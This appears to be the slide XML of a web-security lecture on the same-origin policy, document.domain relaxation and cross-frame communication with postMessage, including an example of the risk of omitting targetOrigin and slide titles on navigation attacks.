              <a:t>VeriSign</a:t>
            </a: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rot="10800000" flipH="1" flipV="1">
            <a:off x="5302250" y="3798888"/>
            <a:ext cx="1739900" cy="315912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endParaRPr lang="en-US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2950" y="3586163"/>
            <a:ext cx="812800" cy="81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algn="ctr" rotWithShape="0">
              <a:srgbClr val="FFFFFF">
                <a:alpha val="5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950" y="3852863"/>
            <a:ext cx="1041400" cy="6492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4826" name="Picture 10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5200" y="5780088"/>
            <a:ext cx="1041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20" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect r="52881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="5780088"/>
            <a:ext cx="858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9" name="Picture 13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53200" y="5867400"/>
            <a:ext cx="715963" cy="79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Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Domain Relaxation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Content Placeholder 2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609600" y="1828800"/>
            <a:ext cx="7772400" cy="41148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Origin: scheme, host, (port), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>hasSetDomain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Try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r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166916" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="2743200"/>
            <a:ext cx="2819400" cy="1722438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375" y="1960563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325" y="2976563"/>
            <a:ext cx="11430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66919" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="3242714">
            <a:off x="2507456" y="2634457"/>
            <a:ext cx="1482725" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37719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2" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1581150"/>
            <a:ext cx="2497138" cy="339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3" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3065463" y="4060825"/>
            <a:ext cx="2497137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166930" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="3471863"/>
            <a:ext cx="20574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6875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76" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="698500" y="4306888"/>
            <a:ext cx="18161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www.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36877" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2392363" y="3581400"/>
            <a:ext cx="1223962" cy="304800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26" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="3405188"/>
            <a:ext cx="2286000" cy="1147762"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="F8DD6C"/>
              </a:gs>
              <a:gs pos="20000">
                <a:srgbClr val="F4DB6E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BBA753"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="E9D57C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lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36879" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6032500" y="4229100"/>
            <a:ext cx="193992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pic>
        <p:nvPicPr>
          <p:cNvPr id="3688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4718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68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975" y="2073275"/>
            <a:ext cx="936625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6882" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="1676400"/>
            <a:ext cx="24130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chat.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="65103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2" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1862138" y="2759075"/>
            <a:ext cx="1060450" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37730"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC">
              <a:alpha val="74901"/>
            </a:srgbClr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sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4705350" y="3657600"/>
            <a:ext cx="1309688" cy="327025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665413" y="3459163"/>
            <a:ext cx="655637" cy="601662"/>
            <a:chOff x="5608626" y="1600199"/>
            <a:chExt cx="655015" cy="602082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36889" name="Straight Connector 34"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5608626" y="1600200"/>
              <a:ext cx="655014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36890" name="Straight Connector 35"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="5608628" y="1600199"/>
              <a:ext cx="655013" cy="602081"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127000" cap="rnd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6096000" y="4210050"/>
            <a:ext cx="1792288" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln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65463" y="4060825"/>
            <a:ext cx="2497137" cy="361950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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>facebook.com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5" grpId="0" animBg="1"/>
      <p:bldP spid="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 smtClean="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Additional mechanisms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRP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549275" y="2079625"/>
            <a:ext cx="8069263" cy="402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4290" tIns="34290" rIns="34290" bIns="34290" anchor="ctr"/>
          <a:lstStyle/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network requests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&lt;list of domains&gt;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Access-Control-Allow-Origin: *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="296863" lvl="1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Cross-origin client side communication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Client-side messaging via navigation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>old 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browsers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754063" lvl="2" indent="-296863">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buSzPct val="46000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>postMessage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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>(modern browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167941" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="1714500"/>
            <a:ext cx="1439863" cy="1165225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79425"/>
            <a:ext cx="936625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69263" y="446088"/>
            <a:ext cx="938212" cy="5826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5" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8164513" y="157163"/>
            <a:ext cx="796925" cy="338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B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37896" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6380163" y="203200"/>
            <a:ext cx="787400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2200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167946" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7658100" y="1714500"/>
            <a:ext cx="1371600" cy="1149350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="12700">
            <a:noFill/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</p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37898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1782763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899" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6011863" y="2606675"/>
            <a:ext cx="1284287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A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0" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6972300" y="822325"/>
            <a:ext cx="1096963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pic>
        <p:nvPicPr>
          <p:cNvPr id="37901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32738" y="1714500"/>
            <a:ext cx="76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7902" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7693025" y="2606675"/>
            <a:ext cx="1290638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600" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>B context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37903" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7178675" y="822325"/>
            <a:ext cx="1028700" cy="871538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4" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="84121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37905" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6697663" y="822325"/>
            <a:ext cx="0" cy="823913"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="969696"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln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5" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7246938" y="2057400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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167956" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="7246938" y="2332038"/>
            <a:ext cx="547687" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="65AFFB"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82296" tIns="41148" rIns="82296" bIns="41148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window.postMessage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Content Placeholder 4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API for inter-frame communication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Supported in standard browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>A network-like channel between frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3891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81940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819400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130" descr="ie-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0" descr="chrome-logo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3925" y="2819400"/>
            <a:ext cx="549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94387" y="4267200"/>
            <a:ext cx="1676400" cy="20034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38922" name="Right Arrow 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3989387" y="4724400"/>
            <a:ext cx="1905000" cy="768350"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49989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Add a contact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38923" name="Right Arrow 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3989387" y="5545138"/>
            <a:ext cx="1828800" cy="704850"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49946"/>
            </a:avLst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009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Share contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38924" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4191000"/>
            <a:ext cx="6961187" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect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8925" name="Picture 28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03387" y="5216525"/>
            <a:ext cx="17526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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="3200400"/>
            <a:ext cx="7772400" cy="1600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39" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="1920875"/>
            <a:ext cx="7772400" cy="8382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postMessage syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39941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endParaRPr lang="en-US" sz="2000" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/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frames[0].postMessage("Attack at dawn!",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                  "http://b.com/");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRP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window.addEventListener("message", function (e)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if (e.origin == "http://a.com") {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    ... e.data ... }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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}, false);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="10-Point Star 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="6096000"/>
            <a:ext cx="762000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="star10">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg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Facebook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="172252"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Anecdote</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39945" name="Picture 12" descr="a.com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6" name="Picture 13" descr="b.com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40400" y="4964113"/>
            <a:ext cx="2616200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947" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="5751513"/>
            <a:ext cx="25146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948" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3871913" y="5351463"/>
            <a:ext cx="1995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Attack at dawn!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990600" y="2149475"/>
            <a:ext cx="6019800" cy="517525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include “targetOrigin”?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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goes wrong?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900"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2000" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>	frames[0].postMessage("Attack at dawn!");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Messages sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, not principals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>When would this happen?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49157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EAD8062-BFDB-4E21-95A4-C8B019B16442}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="reply-attack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reply-attack-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4389438"/>
            <a:ext cx="2971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Navigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40964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0962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  <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{721E4E98-6C54-4011-A044-49C2C5501BA0}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr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Guninski Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41988" name="Picture 3" descr="adsen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52600"/>
            <a:ext cx="68580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588000" y="4114800"/>
            <a:ext cx="2133600" cy="1536700"/>
            <a:chOff x="4656" y="1440"/>
            <a:chExt cx="864" cy="768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41994" name="Picture 7" descr="transparent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56" y="1440"/>
              <a:ext cx="86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5" name="Rectangle 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4663" y="1440"/>
